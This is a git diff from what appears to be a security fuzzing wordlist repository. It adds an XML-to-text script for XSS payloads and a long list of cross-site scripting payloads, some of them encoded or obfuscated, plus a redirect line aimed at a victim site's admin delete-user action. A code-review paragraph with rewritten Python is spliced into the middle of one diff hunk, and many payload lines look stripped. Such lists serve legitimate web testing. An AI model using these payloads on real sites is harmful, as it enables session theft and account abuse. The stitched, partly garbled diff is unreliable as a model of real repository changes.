diff --git a/.bin/README.md b/.bin/README.md
index 4dd41a18..fb8babaf 100644
--- a/.bin/README.md
+++ b/.bin/README.md
@@ -13,3 +13,7 @@ e.g. target dir is `Passwords/Common-Credentials` and suffix is `-without-curse-
 `os-names-mutate.py` mutates `Fuzzing/os-names.txt` to include possible mutations of OS names in a url. By default this script outputs the results in `Fuzzing/os-names-mutated.txt`
+
+- - -
+
+`xml-parser.py` parses xml files given as arguments and extracts hardcoded tags. It's meant to be modified as per file basis as every xml file format is unique.
\ No newline at end of file
diff --git a/.bin/xml-parser.py b/.bin/xml-parser.py
new file mode 100755
index 00000000..f5dd9b19
--- /dev/null
+++ b/.bin/xml-parser.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+import os
+import sys
+import xml.etree.ElementTree as et
+
+if len(sys.argv) == 1:
+    exit(0)
+
+files=sys.argv[1].split(" ")
+
+for i in files:
+    if not os.path.isfile(i):
+        print("[!] %s does not exist!"%(i))
+        exit(2)
+
+for i in files:
+    xml_file = et.parse(i)
+
+    contents = []
+
+    for j in xml_file.getroot().findall("attack"):
+        xss = j.find('code').text
+
+        if not xss:
+            continue
+
+        if "\n" in xss:
+            print("Xss have newline in it.")
+            print(xss, "\n")
+
+        contents.append(xss)
+
+    file_dir, file_name = i.rsplit("/", 1)
+    file_name = os.path.join(file_dir, file_name.rsplit(".", 1)[0] + ".txt")
+
+    open(file_name, "w").write("\n".join(contents))
+
+    print(f"Wrote to {file_name}")
+
+    
\ No newline at end of file
diff --git a/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt b/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt
index 7865f8fe..edebeb84 100644
--- a/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt
+++ b/Fuzzing/XSS/human-friendly/XSS-BruteLogic.txt
@@ -111,3 +111,4 @@ GIF89a/**/=alert(document.domain)//;
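Review bot: `files=sys.argv[1].split(" ")` reads only the first argument and splits it on spaces, so `xml-parser.py a.xml b.xml` silently ignores `b.xml` while a path containing a space is reported as missing; the README text in this same commit says the files are "given as arguments", which is `files = sys.argv[1:]`. Further down, `file_dir, file_name = i.rsplit("/", 1)` raises ValueError for a bare filename such as `foo.xml`, and `open(file_name, "w").write(...)` neither closes the handle nor names an encoding, so the non-ASCII payload text stored in this repository can fail with UnicodeEncodeError under a non-UTF-8 locale; `os.path.splitext` plus a `with open(..., encoding="utf-8")` block covers both. `j.find('code').text` also raises AttributeError on an `<attack>` element without a `<code>` child, which the later `if not xss` guard cannot catch. The rewritten lines below keep the output file names and printed messages unchanged.
```python
files = sys.argv[1:]
# … unchanged: existence check and exit(2) …
for i in files:
    xml_file = et.parse(i)
    contents = []
    for j in xml_file.getroot().findall("attack"):
        code = j.find("code")
        xss = code.text if code is not None else None
        if not xss:
            continue
        # … unchanged: newline warning and contents.append(xss) …
    # splitext handles a bare filename, where rsplit("/", 1) raised ValueError
    file_name = os.path.splitext(i)[0] + ".txt"
    with open(file_name, "w", encoding="utf-8") as fh:
        fh.write("\n".join(contents))
    print(f"Wrote to {file_name}")
```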
right click me! + \ No newline at end of file diff --git a/Fuzzing/XSS/XSS-EnDe-evation.txt b/Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-evation.txt rename to Fuzzing/XSS/human-friendly/XSS-EnDe-evation.txt diff --git a/Fuzzing/XSS/XSS-EnDe-h4k.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-h4k.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-h4k.xml diff --git a/Fuzzing/XSS/XSS-EnDe-mario.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-mario.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-mario.xml diff --git a/Fuzzing/XSS/XSS-EnDe-xssAttacks.xml b/Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml similarity index 100% rename from Fuzzing/XSS/XSS-EnDe-xssAttacks.xml rename to Fuzzing/XSS/human-friendly/XSS-EnDe-xssAttacks.xml diff --git a/Fuzzing/XSS/XSS-payloadbox.txt b/Fuzzing/XSS/human-friendly/XSS-payloadbox.txt similarity index 100% rename from Fuzzing/XSS/XSS-payloadbox.txt rename to Fuzzing/XSS/human-friendly/XSS-payloadbox.txt diff --git a/Fuzzing/XSS/robot-friendly/README.md b/Fuzzing/XSS/robot-friendly/README.md index 4a7526df..1a3d5229 100644 --- a/Fuzzing/XSS/robot-friendly/README.md +++ b/Fuzzing/XSS/robot-friendly/README.md @@ -10,4 +10,66 @@ Some XSS trigger condition may require you to interact with the web pages to tri To see the results, look out for message popups or network activity in the devtools of your browser. -Happy hacking! \ No newline at end of file +Happy hacking! + +## Removed xss + +### XSS-EnDe-h4k.txt + +Removed because there was no way to squash it into one line + +``` +_ += +eval +b=1 +__ += +location +c=1 +_ +( +__ +. +hash +// +. +substr +(1) +) +``` +### XSS-EnDe-xssAttacks.txt + +Also removed due to it's multiline nature + +``` + +``` 
diff --git a/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt b/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt index 8c78ffbd..edebeb84 100644 --- a/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt +++ b/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt @@ -110,4 +110,5 @@ GIF89a/**/=alert(document.domain)//;
right click me! \ No newline at end of file +right click me! + \ No newline at end of file diff --git a/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt b/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt new file mode 100644 index 00000000..fd2e4a26 --- /dev/null +++ b/Fuzzing/XSS/robot-friendly/XSS-EnDe-evation.txt 
@@ -0,0 +1,164 @@ +"'`ʼˈ‘’‚‛“”„‟′″‴‵‶‷﹅﹐"',舧艠︐︑--> +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'> +"'><\script>confirm(42) +"'>confirm(42) +"'>confirm(42) +"'> +"'>alert(42) +"'><;(24)trela=daolno ;''=e>'=d +"'><;(24)trela=daolno ;''=/e>'=d +"'> +"'>confirm(42) +"'%3e%3cscript%3econfirm(42)%3c/script%3e +"'%253e%253cscript%253econfirm(42)%253c/script%253e +"'%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +"'%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +"'%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +"'%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +%22%27%3e%3cscript%3econfirm(42)%3c/script%3e +%u22%u27%u3e%u3cscript%u3econfirm(42)%u3c/script%u3e +%u0022%u0027%u003e%u003cscript%u003econfirm(42)%u003c/script%u003e +%2522%2527%253e%253cscript%253econfirm(42)%253c/script%253e +%252522%252527%25253e%25253cscript%25253econfirm(42)%25253c/script%25253e +%25u22%25u27%25u3e%25u3cscript%25u3econfirm(42)%25u3c/script%25u3e +%25u0022%25u0027%25u003e%25u003cscript%25u003econfirm(42)%25u003c/script%25u003e +"'> +"'ܾܼscriptܾalert(42)ܼܯscriptܾ +"'%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +"'%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +%07%22%07%27%07%3e%07%3cscript%07%3ealert(42)%07%3c/script%07%3e +%u0722%u0727%u073e%u073cscript%u073ealert(42)%u073c/script%u073e +"'%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +"'%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +%2507%2522%2507%2527%2507%253e%2507%253cscript%2507%253ealert(42)%2507%253c/script%2507%253e +%25u0722%25u0727%25u073e%25u073cscript%25u073ealert(42)%25u073c/script%25u073e +javascript:alert(42) +javascript:prompt(42) +javascript:confirm(42) +jAvasCript:confirm(42) +jAvas\Cript:confirm(42) +jAvas Cript:confirm(42) +jAvas/* */Cript:confirm(42) + javascript:alert(42) +document +document. +top +top. 
+top[ +eval +eval( +cookie +.cookie +onerror +onerror= +onclick +onclick= +onmouseover +onmouseover= +onload +onload= +"onerror +"onerror= +"onclick +"onclick= +"onmouseover +"onmouseover= +"onload +"onload= +href= +src= +link= +style= +alt= +title= +egal= +"href= +"src= +"link= +"style= +"alt= +"title= +"egal= + +/ + +a=%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3edocument.write(unescape(a..b)) + + + + + + +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser + + +exp/* + + + +XSS +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +
+XSS +%0da=eval;b=alert;a(b(/d/.source)); +test ++alert(0)+ + + +